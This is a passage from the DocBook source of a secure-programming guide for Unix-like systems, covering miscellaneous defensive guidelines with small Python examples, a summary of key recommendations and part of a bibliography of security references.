Modem lights are also enough to determine the underlying communication.
</para>
</sect1>

<sect1 id="miscellaneous">
<title>Miscellaneous</title>

<para>
The following are miscellaneous security guidelines that I couldn't
seem to fit anywhere else:
</para>

<para>
Have your program check at least some of its assumptions before it uses them
(e.g., at the beginning of the program).
For example, if you depend on the ``sticky'' bit being set on a given
directory, test it; such tests take little time and could prevent
a serious problem.
If you worry about the execution time of some tests on each call, at least
perform them at installation time or, better still,
at application start-up.
</para>
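<para>
The sticky-bit example can be checked in a few lines.
This Python sketch uses os.stat() and stat.filemode() from the standard
library; the function name and the choice to raise RuntimeError are
assumptions for illustration.
</para>
<programlisting>
```python
import os
import stat


def require_sticky_directory(path: str) -> None:
    """Raise RuntimeError unless path is a directory with the sticky bit."""
    mode = os.stat(path).st_mode
    if not stat.S_ISDIR(mode):
        raise RuntimeError(path + " is not a directory")
    # stat.filemode() renders the mode like "drwxrwxrwt"; the final
    # character is "t" or "T" exactly when the sticky bit is set.
    if stat.filemode(mode)[-1] not in "tT":
        raise RuntimeError(path + " does not have the sticky bit set")
```
</programlisting>
<para>
Calling require_sticky_directory("/tmp") once at start-up costs a single
stat() call and turns a silently unsafe configuration into an immediate,
visible failure.
</para>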

<para>
If you have a built-in scripting language, it may be possible for the
language to set an environment variable which adversely affects the
program invoking the script.
Defend against this.
</para>

<para>
If you need a complex configuration language,
make sure the language has a comment
character and include a number of commented-out secure examples.
Often '&num;' is used for commenting, meaning ``the rest
of this line is a comment''.
</para>

<para>
If possible, don't create setuid or setgid root programs;
make the user log in as root instead.
</para>

<para>
Sign your code. That way, others can check to see if what's available
was what was sent.
</para>

<para>
In some applications you may need to worry about timing attacks,
where the variation in timing or CPU utilization is enough to give
away important information.
This kind of attack has been used to obtain keying information from
Smartcards, for example.
Mauro Lacy has
published a paper titled
<ulink url="http://maurol.com.ar/security/RTT.pdf">Remote Timing Techniques</ulink>,
showing that you can (in some cases) determine over the Internet
whether or not a given user id exists, simply from the effort expended
by the CPU
(which can be detected remotely using techniques described in the paper).
The only way to deal with these sorts of problems is to make sure that
the same effort is performed even when it isn't necessary.
The problem is that in some cases this may make the system more vulnerable
to a denial of service attack, since it can't optimize away unnecessary work.
</para>
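<para>
For the user id example, ``performing the same effort even when it isn't
necessary'' might look like the following Python sketch: when the user id is
unknown, the password is still hashed against a dummy record, and the
comparison itself runs in constant time.
The account store (a dictionary mapping user id to salt and hash), the
iteration count, and all names are assumptions made for this illustration.
</para>
<programlisting>
```python
import hashlib
import hmac
import os

ITERATIONS = 10_000  # illustrative work factor, the same for every account


def hash_password(password: bytes, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password, salt, ITERATIONS)


# Dummy record used when the user id does not exist, so that the same
# hashing work is done whether or not the account is real.
_DUMMY_SALT = os.urandom(16)
_DUMMY_HASH = hash_password(os.urandom(16), _DUMMY_SALT)


def check_login(accounts: dict, user: str, password: bytes) -> bool:
    """accounts maps user id to (salt, stored_hash); a hypothetical store."""
    salt, stored = accounts.get(user, (_DUMMY_SALT, _DUMMY_HASH))
    candidate = hash_password(password, salt)           # always computed
    matches = hmac.compare_digest(candidate, stored)    # constant-time
    return matches and user in accounts
```
</programlisting>
<para>
The cost is exactly the one noted above: every failed guess, even for a
nonexistent user, now makes the server do the full hashing work.
</para>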

<para>
Consider statically linking secure programs.
This counters attacks on the dynamic link library mechanism
by making sure that the secure programs don't use it.
There are several downsides to this, however.
This is likely to increase disk and memory use (from multiple copies of the
same routines).
Even worse, it makes updating of libraries
(e.g., for security vulnerabilities) more difficult - in most systems
they won't be automatically updated and have to be tracked and
implemented separately.
</para>

<para>
When reading over code, consider all the cases where a match is not made.
For example, if there is a switch statement, what happens when none of the
cases match?
If there is an ``if'' statement, what happens when the condition is false?
</para>
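<para>
A small Python illustration of handling the ``no match'' case explicitly;
the roles and permissions are invented for the example.
The point is only that the final branch exists and fails safe, rather than
letting an unrecognized value fall through to some default behavior.
</para>
<programlisting>
```python
def permissions_for(role: str) -> set:
    """Map a role to permissions; unknown roles get an explicit refusal."""
    if role == "admin":
        return {"read", "write", "delete"}
    elif role == "editor":
        return {"read", "write"}
    elif role == "viewer":
        return {"read"}
    else:
        # The "no match" case: fail safe instead of falling through.
        raise ValueError("unknown role: " + repr(role))
```
</programlisting>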

<para>
Merely ``removing'' a file doesn't eliminate the file's data from a disk;
on most systems this simply marks the content as ``deleted'' and makes it
eligible for later reuse, and often data is at least temporarily stored
in other places (such as memory, swap files, and temporary files).
Indeed, against a determined attacker, writing over the data isn't enough.
A classic paper on the problems of erasing magnetic media is
Peter Gutmann's paper
<ulink url="http://www-tac.cisco.com/Support_Library/field_alerts/fn13070.html">
``Secure Deletion of Data from Magnetic and Solid-State Memory''</ulink>.
A determined adversary can use other means, too, such as monitoring
electromagnetic emissions from computers (military systems have to obey
TEMPEST rules to overcome this)
and/or surreptitious attacks (such as monitors hidden in keyboards).
</para>

<para>
When fixing a security vulnerability,
consider adding a ``warning'' to detect and log an attempt to
exploit the (now fixed) vulnerability.
This will reduce the likelihood of an attack, especially if there's
no way for an attacker to predetermine if the attack will work,
since it exposes an attack in progress.
In short, it turns a vulnerability into an intrusion detection system.
This also suggests that exposing the version of a server program
before authentication is usually a bad idea for security, since doing so
makes it easy for an attacker to only use attacks that would work.
Some programs make it possible for users to intentionally ``lie'' about their
version, so that attackers will use the ``wrong attacks'' and be detected.
Also, if the vulnerability can be triggered over a network, please make
sure that security scanners can detect the vulnerability.
I suggest contacting Nessus
(<ulink url="http://www.nessus.org">http://www.nessus.org</ulink>)
and making sure that their open source security scanner can detect the
problem.
That way, users who don't check their software for upgrades
will at least learn about the problem during their security vulnerability
scans (if they do them as they should).
</para>
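<para>
As a sketch of the ``warning'' idea, suppose a (hypothetical) fix added a
length limit where an over-long name used to overflow a buffer.
The fixed code can refuse the input and also log the attempt.
The limit, the logger name ``audit'', and the function name are assumptions
for this Python example.
</para>
<programlisting>
```python
import logging

MAX_NAME_LENGTH = 64  # hypothetical limit introduced by the fix

log = logging.getLogger("audit")


def handle_name(name: bytes, peer: str) -> bytes:
    """Accept a name, refusing and reporting inputs that exceed the limit."""
    if len(name) > MAX_NAME_LENGTH:
        # Before the (hypothetical) fix, an over-long name was exploitable.
        # Now the request is refused and the attempt is recorded.
        log.warning("possible exploit attempt from %s: name of %d bytes",
                    peer, len(name))
        raise ValueError("name too long")
    return name
```
</programlisting>
<para>
Only the length is logged here, not the name itself; if you do record
attacker-supplied data, escape it first.
</para>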

<para>
Always include in your documentation contact information for
where to report security problems.
You should also support at least one of the common email addresses
for reporting security problems
(security-alert@SITE, secure@SITE, or security@SITE);
it's often good to have support@SITE and info@SITE working as well.
Be prepared to support industry practices by those who have a security
flaw to report, such as the
<ulink url="http://www.wiretrip.net/rfp/policy.html">
Full Disclosure Policy (RFPolicy)
</ulink>
and the IETF Internet draft,
``Responsible Vulnerability Disclosure Process''.
<!--
http://www.ietf.org/internet-drafts/draft-christey-wysopal-vuln-disclosure-00.txt
http://slashdot.org/article.pl?sid=02/02/21/0559238&mode=thread&tid=9.4
-->
It's important to quickly work with anyone who
is reporting a security flaw; remember that they are doing you a favor
by reporting the problem to you, and that they are under no obligation
to do so.
It's especially important, once the problem is fixed, to give proper credit
to the reporter of the flaw (unless they ask otherwise).
Many reporters provide the information solely to gain the credit,
and it's generally accepted that credit is owed to the reporter.
Some vendors argue that people should never report vulnerabilities to the
public; the problem with this argument is that this was once common, and the
result was vendors who denied vulnerabilities while their customers were
getting constantly subverted for years at a time.
</para>

<!-- ??? maybe someday add Logging discussion -->

<para>
Follow best practices and common conventions when leading a
software development project.
If you are leading an open source software / free software project,
some useful guidelines can be found in
<ulink url="http://www.tldp.org/HOWTO/Software-Proj-Mgmt-HOWTO/index.html">
Free Software Project Management HOWTO</ulink> and
<ulink url="http://www.tldp.org/HOWTO/Software-Release-Practice-HOWTO/index.html">
Software Release Practice HOWTO</ulink>;
you should also read
<ulink url="http://www.catb.org/~esr/writings/cathedral-bazaar">
The Cathedral and the Bazaar</ulink>.
</para>

<para>
Every once in a while, review security guidelines like this one.
At least re-read the conclusions in <xref linkend="conclusion">,
and feel free to go back to the introduction
(<xref linkend="introduction">) and start again!
</para>


</sect1>


</chapter>


<chapter id="conclusion">
<title>Conclusion</title>

<epigraph>
<attribution>Ecclesiastes 7:8 (NIV)</attribution>
<para>
The end of a matter is better than its beginning, and
patience is better than pride.
</para>
</epigraph>

<para>
Designing and implementing a truly secure program
is actually a difficult task on Unix-like systems such as Linux and Unix.
The difficulty is that a truly secure program must respond
appropriately to all possible inputs and environments
controlled by a potentially hostile user.
Developers of secure programs must deeply understand their platform,
seek and use guidelines (such as these), and then use assurance
processes (such as inspections and other peer review techniques)
to reduce their programs' vulnerabilities.
</para>

<para>
In conclusion, here are some of the key guidelines in this book:

<itemizedlist>
<listitem>

<para>
Validate all your inputs, including command line inputs,
environment variables, CGI inputs, and so on.
Don't just reject ``bad'' input; define what is an ``acceptable'' input
and reject anything that doesn't match.
</para>
</listitem>
<listitem>

<para>
Avoid buffer overflow.
Make sure that long inputs (and long intermediate data values) can't
be used to take over your program.
This is the primary programmatic error at this time.
</para>
</listitem>
<listitem>

<para>
Structure program internals.
Secure the interface, minimize privileges, make the initial configuration
and defaults safe, and fail safe.
Avoid race conditions (e.g., by safely opening any files in a shared
directory like /tmp).
Trust only trustworthy channels
(e.g., most servers must not trust their clients for security checks or
other sensitive data such as an item's price in a purchase).
</para>
</listitem>
<listitem>

<para>
Carefully call out to other resources.
Limit their values to valid values (in particular be concerned about
metacharacters), and check all system call return values.
</para>
</listitem>
<listitem>

<para>
Reply information judiciously.
In particular, minimize feedback, and handle full or unresponsive output
to an untrusted user.
</para>
</listitem>

</itemizedlist>

</para>

</chapter>

<chapter id="bibliography">
<title>Bibliography</title>

<epigraph>
<attribution>Ecclesiastes 12:11-12 (NIV)</attribution>
<para>
The words of the wise are like goads, their collected sayings like
firmly embedded nails--given by one Shepherd.
Be warned, my son, of anything in addition to them.
Of making many books there is no end, and much study wearies the body.
</para>
</epigraph>

<para>
<emphasis remap="it">Note that there is a heavy
emphasis on technical articles available on the web, since this is where
most of this kind of technical information is available.</emphasis>
</para>

<para>
[Advosys 2000]
Advosys Consulting
(formerly named Webber Technical Services).
<emphasis remap="it">Writing Secure Web Applications</emphasis>.
<ulink url="http://advosys.ca/tips/web-security.html">http://advosys.ca/tips/web-security.html</ulink>
<!-- was http://www.webbertech.com/tips/web-security.html -->
</para>

<para>
[Al-Herbish 1999]
Al-Herbish, Thamer.
1999.
<emphasis remap="it">Secure Unix Programming FAQ</emphasis>.
<ulink
url="http://www.whitefang.com/sup">http://www.whitefang.com/sup</ulink>.
</para>

<para>
[Aleph1 1996]
Aleph1.
November 8, 1996.
``Smashing The Stack For Fun And Profit''.
<emphasis remap="it">Phrack Magazine</emphasis>.
Issue 49, Article 14.
<!-- ???: may need to double-escape the ampersand here. -->
<ulink
url="http://www.phrack.com/search.phtml?view&amp;article=p49-14">http://www.phrack.com/search.phtml?view&amp;article=p49-14</ulink>
or alternatively
<ulink
url="http://www.2600.net/phrack/p49-14.html">http://www.2600.net/phrack/p49-14.html</ulink>.
</para>

<para>
[Anonymous 1999]
Anonymous.
October 1999.
Maximum Linux Security:
A Hacker's Guide to Protecting Your Linux Server and Workstation.
Sams.
ISBN: 0672316706.
</para>

<para>
[Anonymous 1998]
Anonymous.
September 1998.
Maximum Security : A Hacker's Guide to Protecting Your
Internet Site and Network.
Sams.
Second Edition.
ISBN: 0672313413.
</para>

<para>
[Anonymous Phrack 2001]
Anonymous.
August 11, 2001.
Once upon a free().
Phrack, Volume 0x0b, Issue 0x39, Phile #0x09 of 0x12.
<ulink url="http://phrack.org/show.php?p=57&amp;a=9">
http://phrack.org/show.php?p=57&amp;a=9
</ulink>
</para>

<para>
[AUSCERT 1996]
Australian Computer Emergency Response Team (AUSCERT) and O'Reilly.
May 23, 1996 (rev 3C).
<emphasis remap="it">A Lab Engineers Check List for Writing Secure Unix Code</emphasis>.
<ulink
url="ftp://ftp.auscert.org.au/pub/auscert/papers/secure_programming_checklist">ftp://ftp.auscert.org.au/pub/auscert/papers/secure_programming_checklist</ulink>
</para>

<para>
[Bach 1986]
Bach, Maurice J.
1986.
<emphasis remap="it">The Design of the Unix Operating System</emphasis>.
Englewood Cliffs, NJ: Prentice-Hall, Inc.
ISBN 0-13-201799-7 025.
</para>

<para>
[Beattie 2002]
Beattie, Steve, Seth Arnold, Crispin Cowan, Perry Wagle, Chris Wright,
Adam Shostack.
November 2002.
Timing the Application of Security Patches for Optimal Uptime.
2002 LISA XVI, November 3-8, 2002, Philadelphia, PA.
</para>

<para>
[Bellovin 1989]
Bellovin, Steven M.
April 1989.
``Security Problems in the TCP/IP Protocol Suite''.
Computer Communications Review 2:19, pp. 32-48.
<ulink
url="http://www.research.att.com/~smb/papers/ipext.pdf">http://www.research.att.com/~smb/papers/ipext.pdf</ulink>
</para>

<para>
[Bellovin 1994]
Bellovin, Steven M.
December 1994.
<emphasis remap="it">Shifting the Odds -- Writing (More) Secure Software</emphasis>.
Murray Hill, NJ: AT&amp;T Research.
<ulink
url="http://www.research.att.com/~smb/talks">http://www.research.att.com/~smb/talks</ulink>
</para>

<para>
[Bishop 1996]
Bishop, Matt.
May 1996.
``UNIX Security: Security in Programming''.
<emphasis remap="it">SANS '96</emphasis>. Washington DC (May 1996).
<ulink
url="http://olympus.cs.ucdavis.edu/~bishop/secprog.html">http://olympus.cs.ucdavis.edu/~bishop/secprog.html</ulink>
</para>

<para>
[Bishop 1997]
Bishop, Matt.
October 1997.
``Writing Safe Privileged Programs''.
<emphasis remap="it">Network Security 1997</emphasis>
New Orleans, LA.
<ulink
url="http://olympus.cs.ucdavis.edu/~bishop/secprog.html">http://olympus.cs.ucdavis.edu/~bishop/secprog.html</ulink>
</para>

<para>
[Blaze 1996]
Blaze, Matt, Whitfield Diffie, Ronald L. Rivest, Bruce Schneier,
Tsutomu Shimomura, Eric Thompson, and Michael Wiener.
January 1996.
``Minimal Key Lengths for Symmetric Ciphers to Provide
Adequate Commercial Security:
A Report by an Ad Hoc Group of Cryptographers and Computer Scientists.''
<ulink url="ftp://ftp.research.att.com/dist/mab/keylength.txt">
ftp://ftp.research.att.com/dist/mab/keylength.txt</ulink> and
<ulink url="ftp://ftp.research.att.com/dist/mab/keylength.ps">ftp://ftp.research.att.com/dist/mab/keylength.ps</ulink>.
</para>

<para>
[CC 1999]
<emphasis remap="it">The Common Criteria for Information Technology Security Evaluation
(CC)</emphasis>.
August 1999.
Version 2.1.
Technically identical to International Standard ISO/IEC 15408:1999.
<ulink
url="http://csrc.nist.gov/cc/ccv20/ccv2list.htm">http://csrc.nist.gov/cc/ccv20/ccv2list.htm</ulink>
</para>

<para>
[CERT 1998]
Computer Emergency Response Team (CERT) Coordination Center (CERT/CC).
February 13, 1998.
<emphasis remap="it">Sanitizing User-Supplied Data in CGI Scripts</emphasis>.
CERT Advisory CA-97.25.CGI&lowbar;metachar.
<ulink
url="http://www.cert.org/advisories/CA-97.25.CGI_metachar.html">http://www.cert.org/advisories/CA-97.25.CGI_metachar.html</ulink>.
</para>

<para>
[Cheswick 1994]
Cheswick, William R. and Steven M. Bellovin.
Firewalls and Internet Security: Repelling the Wily Hacker.
Full text at
<ulink url="http://www.wilyhacker.com">
http://www.wilyhacker.com</ulink>.
</para>

<para>
[Clowes 2001]
Clowes, Shaun.
2001.
``A Study In Scarlet - Exploiting Common Vulnerabilities in PHP''.
<ulink url="http://www.securereality.com.au/archives.html">http://www.securereality.com.au/archives.html</ulink>
</para>


<para>
[CMU 1998]
Carnegie Mellon University (CMU).
February 13, 1998.
Version 1.4.
``How To Remove Meta-characters From User-Supplied Data In CGI Scripts''.
<ulink
url="ftp://ftp.cert.org/pub/tech_tips/cgi_metacharacters">ftp://ftp.cert.org/pub/tech_tips/cgi_metacharacters</ulink>.
</para>

<para>
[Cowan 1999]
Cowan, Crispin, Perry Wagle, Calton Pu, Steve Beattie, and
Jonathan Walpole.
``Buffer Overflows: Attacks and Defenses for the Vulnerability
of the Decade''.
Proceedings of DARPA Information Survivability Conference and Expo (DISCEX),
<ulink
url="http://schafercorp-ballston.com/discex">http://schafercorp-ballston.com/discex</ulink>
SANS 2000.
<ulink
url="http://www.sans.org/newlook/events/sans2000.htm">http://www.sans.org/newlook/events/sans2000.htm</ulink>.
For a copy, see
<ulink
url="http://immunix.org/documentation.html">http://immunix.org/documentation.html</ulink>.
</para>

<para>
[Cox 2000]
Cox, Philip.
March 30, 2001.
Hardening Windows 2000.
<ulink url="http://www.systemexperts.com/win2k/hardenW2K11.pdf">http://www.systemexperts.com/win2k/hardenW2K11.pdf</ulink>.
<!-- http://www.systemexperts.com/win2k.shtml -->
</para>

<para>
[Dobbertin 1996]
Dobbertin, H.
1996.
The Status of MD5 After a Recent Attack.
RSA Laboratories' CryptoBytes.
Vol. 2, No. 2.
</para>

<para>
[Felten 1997]
Edward W. Felten, Dirk Balfanz, Drew Dean, and Dan S. Wallach.
Web Spoofing: An Internet Con Game.
Technical Report 540-96 (revised Feb. 1997).
Department of Computer Science, Princeton University.
<ulink url="http://www.cs.princeton.edu/sip/pub/spoofing.pdf">
http://www.cs.princeton.edu/sip/pub/spoofing.pdf
</ulink>
</para>


<para>
[Fenzi 1999]
Fenzi, Kevin, and Dave Wreski.
April 25, 1999.
<emphasis remap="it">Linux Security HOWTO</emphasis>.
Version 1.0.2.
<ulink
url="http://www.tldp.org/HOWTO/Security-HOWTO.html">http://www.tldp.org/HOWTO/Security-HOWTO.html</ulink>
</para>

<para>
[FHS 1997]
Filesystem Hierarchy Standard (FHS 2.0).
October 26, 1997.
Filesystem Hierarchy Standard Group, edited by Daniel Quinlan.
Version 2.0.
<ulink
url="http://www.pathname.com/fhs">http://www.pathname.com/fhs</ulink>.
</para>

<para>
[Filipski 1986]
Filipski, Alan and James Hanko.
April 1986.
``Making Unix Secure.''
Byte (Magazine).
Peterborough, NH: McGraw-Hill Inc.
Vol. 11, No. 4.
ISSN 0360-5280.
pp. 113-128.
</para>

<para>
[Flake 2001]
Flake, Halvar.
Auditing Binaries for Security Vulnerabilities.
<ulink url="http://www.blackhat.com/html/win-usa-01/win-usa-01-speakers.html">http://www.blackhat.com/html/win-usa-01/win-usa-01-speakers.html</ulink>.
</para>

<para>
[FOLDOC]
Free On-Line Dictionary of Computing.
<ulink
url="http://foldoc.doc.ic.ac.uk/foldoc/index.html">
http://foldoc.doc.ic.ac.uk/foldoc/index.html</ulink>.
</para>

<para>
[Forristal 2001]
Forristal, Jeff, and Greg Shipley.
January 8, 2001.
Vulnerability Assessment Scanners.
Network Computing.
<ulink url="http://www.nwc.com/1201/1201f1b1.html">http://www.nwc.com/1201/1201f1b1.html</ulink>
</para>

<para>
[FreeBSD 1999]
FreeBSD, Inc.
1999.
``Secure Programming Guidelines''.
<emphasis remap="it">FreeBSD Security Information</emphasis>.
<ulink
url="http://www.freebsd.org/security/security.html">http://www.freebsd.org/security/security.html</ulink>
</para>

<para>
[Friedl 1997]
Friedl, Jeffrey E. F.
1997.
Mastering Regular Expressions.
O'Reilly.
ISBN 1-56592-257-3.
</para>

<para>
[FSF 1998]
Free Software Foundation.
December 17, 1999.
<emphasis remap="it">Overview of the GNU Project</emphasis>.
<ulink
url="http://www.gnu.ai.mit.edu/gnu/gnu-history.html">http://www.gnu.ai.mit.edu/gnu/gnu-history.html</ulink>
</para>

<para>
[FSF 1999]
Free Software Foundation.
January 11, 1999.
<emphasis remap="it">The GNU C Library Reference Manual</emphasis>.
Edition 0.08 DRAFT, for Version 2.1 Beta of the GNU C Library.
Available at, for example,
<ulink url="http://www.netppl.fi/~pp/glibc21/libc_toc.html">http://www.netppl.fi/~pp/glibc21/libc_toc.html</ulink>
</para>

<para>
[Fu 2001]
Fu, Kevin, Emil Sit, Kendra Smith, and Nick Feamster.
August 2001.
``Dos and Don'ts of Client Authentication on the Web''.
Proceedings of the 10th USENIX Security Symposium,
Washington, D.C., August 2001.
<ulink url="http://cookies.lcs.mit.edu/pubs/webauth.html">
http://cookies.lcs.mit.edu/pubs/webauth.html</ulink>.
</para>

<para>
[Gabrilovich 2002]
Gabrilovich, Evgeniy, and Alex Gontmakher.
February 2002.
``Inside Risks: The Homograph Attack''.
Communications of the ACM.
Volume 45, Number 2.
Page 128.

</para>

<para>
[Galvin 1998a]
Galvin, Peter.
April 1998.
``Designing Secure Software''.
<emphasis remap="it">Sunworld</emphasis>.
<ulink
url="http://www.sunworld.com/swol-04-1998/swol-04-security.html">http://www.sunworld.com/swol-04-1998/swol-04-security.html</ulink>.
</para>

<para>
[Galvin 1998b]
Galvin, Peter.
August 1998.
``The Unix Secure Programming FAQ''.
<emphasis remap="it">Sunworld</emphasis>.
<ulink
url="http://www.sunworld.com/sunworldonline/swol-08-1998/swol-08-security.html">http://www.sunworld.com/sunworldonline/swol-08-1998/swol-08-security.html</ulink>
</para>

<para>
[Garfinkel 1996]
Garfinkel, Simson and Gene Spafford.
April 1996.
<emphasis remap="it">Practical UNIX &amp; Internet Security, 2nd Edition</emphasis>.
ISBN 1-56592-148-8.
Sebastopol, CA: O'Reilly &amp; Associates, Inc.
<ulink
url="http://www.oreilly.com/catalog/puis">http://www.oreilly.com/catalog/puis</ulink>
</para>

<para>
[Garfinkle 1997]
Garfinkel, Simson.
August 8, 1997.
21 Rules for Writing Secure CGI Programs.
<ulink url="http://webreview.com/wr/pub/97/08/08/bookshelf">
http://webreview.com/wr/pub/97/08/08/bookshelf</ulink>
</para>

<para>
[Gay 2000]
Gay, Warren W.
October 2000.
Advanced Unix Programming.
Indianapolis, Indiana: Sams Publishing.
ISBN 0-67231-990-X.
</para>

<para>
[Geodsoft 2001]
Geodsoft.
February 7, 2001.
Hardening OpenBSD Internet Servers.
<ulink url="http://www.geodsoft.com/howto/harden">http://www.geodsoft.com/howto/harden</ulink>.
</para>


<para>
[Graham 1999]
Graham, Jeff.
May 4, 1999.
<emphasis remap="it">Security-Audit's Frequently Asked Questions (FAQ)</emphasis>.
<ulink
url="http://lsap.org/faq.txt">http://lsap.org/faq.txt</ulink>
</para>

<para>
[Gong 1999]
Gong, Li.
June 1999.
<emphasis remap="it">Inside Java 2 Platform Security</emphasis>.
Reading, MA: Addison Wesley Longman, Inc.
ISBN 0-201-31000-7.
</para>

<para>
[Gundavaram Unknown]
Gundavaram, Shishir, and Tom Christiansen.
Date Unknown.
<emphasis remap="it">Perl CGI Programming FAQ</emphasis>.
<ulink
url="http://language.perl.com/CPAN/doc/FAQs/cgi/perl-cgi-faq.html">http://language.perl.com/CPAN/doc/FAQs/cgi/perl-cgi-faq.html</ulink>
</para>

<para>
[Hall 1999]
Hall, Brian "Beej".
Beej's Guide to Network Programming Using Internet Sockets.
13-Jan-1999.
Version 1.5.5.
<ulink url="http://www.ecst.csuchico.edu/~beej/guide/net">http://www.ecst.csuchico.edu/~beej/guide/net</ulink>
</para>

<para>
[Howard 2002]
Howard, Michael and David LeBlanc.
2002.
Writing Secure Code.
Redmond, Washington: Microsoft Press.
ISBN 0-7356-1588-8.
</para>

<para>
[ISO 12207]
International Organization for Standardization (ISO).
1995.
Information technology -- Software life cycle processes.
ISO/IEC 12207:1995.
<!-- http://www.iso.ch/iso/en/CatalogueDetailPage.CatalogueDetail?CSNUMBER=21208&ICS1=35&ICS2=80&ICS3= -->
</para>

<para>
[ISO 13335]
International Organization for Standardization (ISO).
ISO/IEC TR 13335.
Guidelines for the Management of IT Security (GMITS).
<!-- This is a technical report, not a standard -->
Note that this is a five-part technical report (not a standard); see also
ISO/IEC 17799:2000.
It includes:
<itemizedlist>
<listitem><para>
         ISO 13335-1: Concepts and Models for IT Security
</para></listitem>
<listitem><para>
         ISO 13335-2: Managing and Planning IT Security
</para></listitem>
<listitem><para>
         ISO 13335-3: Techniques for the Management of IT Security
</para></listitem>
<listitem><para>
         ISO 13335-4: Selection of Safeguards
</para></listitem>
<listitem><para>
         ISO 13335-5: Safeguards for External Connections
</para></listitem>
</itemizedlist>
</para>

<para>
[ISO 17799]
International Organization for Standardization (ISO).
December 2000.
Code of Practice for Information Security Management.
ISO/IEC 17799:2000.
</para>

<para>
[ISO 9000]
International Organization for Standardization (ISO).
2000.
Quality management systems - Fundamentals and vocabulary.
ISO 9000:2000.
See
<ulink url="http://www.iso.ch/iso/en/iso9000-14000/iso9000/selection_use/iso9000family.html">
http://www.iso.ch/iso/en/iso9000-14000/iso9000/selection_use/iso9000family.html</ulink>
</para>

<para>
[ISO 9001]
International Organization for Standardization (ISO).
2000.
Quality management systems - Requirements.
ISO 9001:2000.
</para>

<para>
[Jones 2000]
Jones, Jennifer.
October 30, 2000.
``Banking on Privacy''.
InfoWorld, Volume 22, Issue 44.
San Mateo, CA: International Data Group (IDG).
pp. 1-12.
</para>

<para>
[Kelsey 1998]
Kelsey, J., B. Schneier, D. Wagner, and C. Hall.
March 1998.
"Cryptanalytic Attacks on Pseudorandom Number Generators."
Fast Software Encryption, Fifth International Workshop Proceedings
(March 1998), Springer-Verlag, 1998, pp. 168-188.
<ulink url="http://www.counterpane.com/pseudorandom_number.html">
http://www.counterpane.com/pseudorandom_number.html</ulink>.
</para>

<para>
[Kernighan 1988]
Kernighan, Brian W., and Dennis M. Ritchie.
1988.
<emphasis remap="it">The C Programming Language</emphasis>.
Second Edition.
Englewood Cliffs, NJ: Prentice-Hall.
ISBN 0-13-110362-8.
</para>

<para>
[Kim 1996]
Kim, Eugene Eric.
1996.
<emphasis remap="it">CGI Developer's Guide</emphasis>.
SAMS.net Publishing.
ISBN: 1-57521-087-8
<ulink
url="http://www.eekim.com/pubs/cgibook">http://www.eekim.com/pubs/cgibook</ulink>
</para>

<para>
[Kolsek 2002]
Kolsek, Mitja.
December 2002.
Session Fixation Vulnerability in Web-based Applications.
<ulink url="http://www.acros.si/papers/session_fixation.pdf">
http://www.acros.si/papers/session_fixation.pdf</ulink>.
</para>

<para>
[Kuchling 2000]
Kuchling, A.M.
2000.
Restricted Execution HOWTO.
<ulink url="http://www.python.org/doc/howto/rexec/rexec.html">http://www.python.org/doc/howto/rexec/rexec.html</ulink>
</para>

<para>
[Kuhn 2002]
Kuhn, Markus G.
Optical Time-Domain Eavesdropping Risks
of CRT displays.
Proceedings of the 2002 IEEE Symposium on Security and Privacy,
Oakland, CA, May 12-15, 2002.
<ulink url="http://www.cl.cam.ac.uk/~mgk25/ieee02-optical.pdf">
http://www.cl.cam.ac.uk/~mgk25/ieee02-optical.pdf</ulink>
</para>

<para>
[LSD 2001]
The Last Stage of Delirium.
July 4, 2001.
<emphasis remap="it">UNIX Assembly Codes Development
for Vulnerabilities Illustration Purposes.</emphasis>
<ulink url="http://lsd-pl.net/papers.html#assembly">http://lsd-pl.net/papers.html#assembly</ulink>.
</para>

<para>
[McClure 1999]
McClure, Stuart, Joel Scambray, and George Kurtz.
1999.
<emphasis remap="it">Hacking Exposed: Network Security Secrets and Solutions</emphasis>.
Berkeley, CA: Osborne/McGraw-Hill.
ISBN 0-07-212127-0.
</para>

<para>
[McKusick 1999]
McKusick, Marshall Kirk.
January 1999.
``Twenty Years of Berkeley Unix: From AT&amp;T-Owned to
Freely Redistributable.''
<emphasis remap="it">Open Sources: Voices from the Open Source Revolution</emphasis>.
<ulink
url="http://www.oreilly.com/catalog/opensources/book/kirkmck.html">http://www.oreilly.com/catalog/opensources/book/kirkmck.html</ulink>.
</para>

<para>
[McGraw 1999]
McGraw, Gary, and Edward W. Felten.
December 1998.
Twelve Rules for developing more secure Java code.
Javaworld.
<ulink url="http://www.javaworld.com/javaworld/jw-12-1998/jw-12-securityrules.html">http://www.javaworld.com/javaworld/jw-12-1998/jw-12-securityrules.html</ulink>.
</para>

<para>
[McGraw 1999]
McGraw, Gary, and Edward W. Felten.
January 25, 1999.
Securing Java: Getting Down to Business with Mobile Code, 2nd Edition.
John Wiley &amp; Sons.
ISBN 047131952X.
<ulink url="http://www.securingjava.com">http://www.securingjava.com</ulink>.
</para>

<para>
[McGraw 2000a]
McGraw, Gary and John Viega.
March 1, 2000.
Make Your Software Behave: Learning the Basics of Buffer Overflows.
<ulink
url="http://www-4.ibm.com/software/developer/library/overflows/index.html">http://www-4.ibm.com/software/developer/library/overflows/index.html</ulink>.
</para>

<para>
[McGraw 2000b]
McGraw, Gary and John Viega.
April 18, 2000.
Make Your Software Behave: Software strategies.
In the absence of hardware,
you can devise a reasonably secure random number generator through software.
<ulink url="http://www-106.ibm.com/developerworks/library/randomsoft/index.html?dwzone=security">http://www-106.ibm.com/developerworks/library/randomsoft/index.html?dwzone=security</ulink>.
</para>

<para>
[Miller 1995]
Miller, Barton P.,
David Koski, Cjin Pheow Lee, Vivekananda Maganty,
Ravi Murthy, Ajitkumar Natarajan, and Jeff Steidl.
1995.
Fuzz Revisited: A Re-examination of the Reliability of
UNIX Utilities and Services.
<ulink url="ftp://grilled.cs.wisc.edu/technical_papers/fuzz-revisited.pdf">ftp://grilled.cs.wisc.edu/technical_papers/fuzz-revisited.pdf</ulink>.
</para>

<para>
[Miller 1999]
Miller, Todd C. and Theo de Raadt.
``strlcpy and strlcat -- Consistent, Safe, String Copy and Concatenation''.
<emphasis remap="it">Proceedings of Usenix '99</emphasis>.
<ulink
url="http://www.usenix.org/events/usenix99/millert.html">http://www.usenix.org/events/usenix99/millert.html</ulink> and
<ulink
url="http://www.usenix.org/events/usenix99/full_papers/millert/PACKING_LIST">http://www.usenix.org/events/usenix99/full_papers/millert/PACKING_LIST</ulink>
</para>

<para>
[Mookhey 2002]
Mookhey, K. K.
The Unix Auditor's Practical Handbook.
